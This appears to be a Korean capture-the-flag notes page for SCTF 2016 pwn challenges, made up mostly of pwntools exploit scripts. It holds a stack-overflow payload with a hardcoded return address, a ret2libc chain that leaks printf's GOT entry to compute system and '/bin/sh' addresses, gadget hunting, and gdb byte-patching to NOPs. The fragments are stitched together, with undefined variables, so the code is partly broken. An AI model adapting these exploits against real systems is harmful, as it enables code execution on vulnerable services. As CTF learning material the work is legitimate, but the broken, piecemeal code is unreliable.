앞만 보고 가는거야!!!

from pwn import *

#r = process('./pwn1')
r = remote('127.0.0.1', 1234)

payload = '-1'
payload += 'a'* 44
payload += '\xcd\x84\x04\x08'
payload += '\n'

print '[*] payload\n%s' % hexdump(payload)

r.sendline(payload)
print r.recv()

#r.interactive()

from pwn import *

r = remote('127.0.0.1', 1234)

payload = open('crattack.xml', 'rb').read()

print r.recvuntil( 'XML)' )

r.sendline(payload)

r.interactive()

babyhack@ubuntu:~/tmp/sctf2016/pwn2$ readelf -r ./pwn2

Relocation section '.rel.dyn' at offset 0x2fc contains 2 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
08049ffc  00000306 R_386_GLOB_DAT    00000000   __gmon_start__
0804a040  00000705 R_386_COPY        0804a040   stdout

Relocation section '.rel.plt' at offset 0x30c contains 6 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
0804a00c  00000107 R_386_JUMP_SLOT   00000000   printf
0804a010  00000207 R_386_JUMP_SLOT   00000000   getchar
0804a014  00000307 R_386_JUMP_SLOT   00000000   __gmon_start__
0804a018  00000407 R_386_JUMP_SLOT   00000000   __libc_start_main
0804a01c  00000507 R_386_JUMP_SLOT   00000000   setvbuf
0804a020  00000607 R_386_JUMP_SLOT   00000000   atoi
babyhack@ubuntu:~/tmp/sctf2016/pwn2$  

# babyhack@ubuntu:~/tmp/sctf2016/pwn2$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep 'system' | more
#   244: 00115db0    68 FUNC    GLOBAL DEFAULT   12 svcerr_systemerr@@GLIBC_2.0
#   621: 0003b160    56 FUNC    GLOBAL DEFAULT   12 __libc_system@@GLIBC_PRIVATE
#  1445: 0003b160    56 FUNC    WEAK   DEFAULT   12 system@@GLIBC_2.0

# babyhack@ubuntu:~/tmp/sctf2016/pwn2$ strings -a -tx /lib/i386-linux-gnu/libc.so.6 | grep '/bin/sh'
# 15f5db /bin/sh

# babyhack@ubuntu:~/tmp/sctf2016/pwn2$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep 'printf' | more
#.............................
#   641: 0004a130    45 FUNC    GLOBAL DEFAULT   12 printf@@GLIBC_2.0
#.............................

offset_printf = 0x4A130
offset_system = 0x3B160
offset_binsh = 0x15F5DB

#------------ printf_got leak -------#
#    +----------------------------+

#    |       aaaaaa.....aaaa          |

#    +----------------------------+

#    |            printf_plt           |

#    +----------------------------+

#    |             vuln()               |

#    +----------------------------+

#    |            '%s'                  |

#    +----------------------------+

#    |           print_got            |

#    +----------------------------+

payload += printf_plt
payload += vuln
payload += string_format
payload += printf_got

print '[*] payload\n%s\n' % hexdump(payload)

s.sendline(payload)

print '[*] first recv\n%s\n' % s.recvline()
print '[*] second recv\n%s\n' % s.recvline()

printf_got_leak = s.recvline()
print '[*] printf got\n%s\n' % hexdump(printf_got_leak)

libc_printf_got = hex(u32(printf_got_leak[:4]))

print '[*] lib_printf_got : ', libc_printf_got
 

libc_addr = int(libc_printf_got, 16) - offset_printf
system_addr = libc_addr + offset_system
binsh_addr = libc_addr + offset_binsh

print '[*] libc addr : ', hex(libc_addr)
print '[*] system addr : ', hex(system_addr)
print '[*] /bin/sh addr : ', hex(binsh_addr)

※ https://github.com/0vercl0k/rp

#./rp++ -f ./pwn2 -r 4 | grep 'pop'
# 0x0804864e: pop edi ; pop ebp ; ret  ;  (1 found)
ppr = p32(0x0804864E) # 2 argument so, pop pop ret 

(gdb) set *(unsigned char*)0x400cc3 = 0x90
(gdb) set *(unsigned char*)0x400cc4 = 0x90
(gdb) set *(unsigned char*)0x400ccd = 0x90
(gdb) set *(unsigned char*)0x400cce = 0x90
(gdb) set *(unsigned char*)0x400cd7 = 0x90
(gdb) set *(unsigned char*)0x400cd8 = 0x90
(gdb) disas main